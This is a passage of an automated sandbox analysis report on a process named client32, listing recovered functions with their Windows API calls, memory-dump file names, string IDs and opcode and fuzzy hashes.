  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_memsetwsprintf
• String ID: ..\ctl32\Refcount.cpp
• API String ID: 4120431230-2363596943
• Opcode ID: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
• Instruction ID: fb683ad4537a29421ebad94ea8a5926084d263391e6db2c8366a4dac22183ed0
• Opcode Fuzzy Hash: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
• Instruction Fuzzy Hash: D4E08C3BE4013932C1A1248A7C42FABFA5C4B92AA8F050021FD18A6211A545660181E6
APIs
• RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAE9D
  • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
Strings
• Error %d closing regkey %x, xrefs: 110EAEAD
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Closewvsprintf
• String ID: Error %d closing regkey %x
• API String ID: 843752472-892920262
• Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
• Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
• Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
• Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660
APIs
• LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0072B858,?,?,?,00000100), ref: 111429F9
  • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                    • String ID: NSMTRACE
                                                                                                                                                                                                    • API String ID: 4133054770-4175627554
                                                                                                                                                                                                    • Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61
APIs
• LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: psapi.dll
• API String ID: 1029625771-80456845
• Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
• Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
• Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
• Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: psapi.dll
• API String ID: 1029625771-80456845
• Opcode ID: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
• Instruction ID: b761ed76ea0f9ce8f81cf52a1ef79c57d507c6a42b64ba97d65a0e7c60646a59
• Opcode Fuzzy Hash: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
• Instruction Fuzzy Hash: 36E001B1901B108F87B0CF3AA50464ABEF0BB086503118A2E949EC3A10E330A5858F84
APIs
• LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: nslsp.dll
• API String ID: 1029625771-3933918195
• Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
• Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
• Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
• Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
APIs
• _memset.LIBCMT ref: 11073ECF
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1654520187-0
                                                                                                                                                                                                    • Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1
APIs
• _memset.LIBCMT ref: 1108752F
• InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection_memset
• String ID:
• API String ID: 453477542-0
• Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
• Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
• Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
• Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
• ExtractIconExA.SHELL32(?,00000000,000F042D,0001048B,00000001), ref: 11140B08
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ExtractFileIconModuleName
• String ID:
• API String ID: 3911389742-0
• Opcode ID: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
• Instruction ID: fbd1f7f6eca67a3d4699d4d052ae62d0c626dfd316a41b503206f924cf5b890f
• Opcode Fuzzy Hash: 01063847e38c2fa817ea410c82c91b75b06626eb0c876785d9cfe351996907d3
• Instruction Fuzzy Hash: EFF02478A4511C9FEB48CFE4CC86FBDF769E784708F808269EE12871C4CE7029488740
APIs
  • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
• __lock_file.LIBCMT ref: 1116057C
• __fclose_nolock.LIBCMT ref: 11160587
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2959217138-0
• Opcode ID: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
• Instruction ID: c99a5f40794e7bd6d5a1a4a2a70ed171e4b9561b0896b3e5cf790a4aaee0ba1f
• Opcode Fuzzy Hash: 9c94bd5ad8adf114722855a36b49f4cfe2d274427d0abc081df420240f29e7a8
• Instruction Fuzzy Hash: A7F09035D11B179AD710AB7598047AEFBB86F0133CF118208C4649A1D0CBFEAA21DB96
APIs
• GetTickCount.KERNEL32 ref: 685A6C26
• Sleep.KERNEL32(00000064), ref: 685A6C5B
  • Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4250438611-0
                                                                                                                                                                                                    • Opcode ID: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
                                                                                                                                                                                                    • Instruction ID: 661e61dc1211ccd4f13e12e72c8a70072f1f8168924ab5dea67af204b1cc2986
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ffbe2ba07ed7edafacd5dee2bb539a8235f082dc1d35ef028f6fdfd2a9b8d15
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77F05431640304CECF14EB7889983ACB6E1EB92315F92012ADA229A680E774CC80C746
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WSACancelBlockingCall.WSOCK32 ref: 685963A9
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 685963B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BlockingCallCancelSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3706969569-0
                                                                                                                                                                                                    • Opcode ID: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
                                                                                                                                                                                                    • Instruction ID: 9c7c155be69afa6d0bd9e6666db90ee95b709ffd67e9b265f4dba9f265acbfe9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf3026702103ff340213a672aac302d0c12d1cbce9ad8d3bb249a37ebd04398e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80B092782A22A069AF40137109062BA20C80FD5287FE104602B59CA085EF20C504A5A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141430: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
                                                                                                                                                                                                      • Part of subcall function 1116076B: __fsopen.LIBCMT ref: 11160778
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0072B858,000000FF,?), ref: 11141545
                                                                                                                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0072B858,000000FF,?), ref: 11141555
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
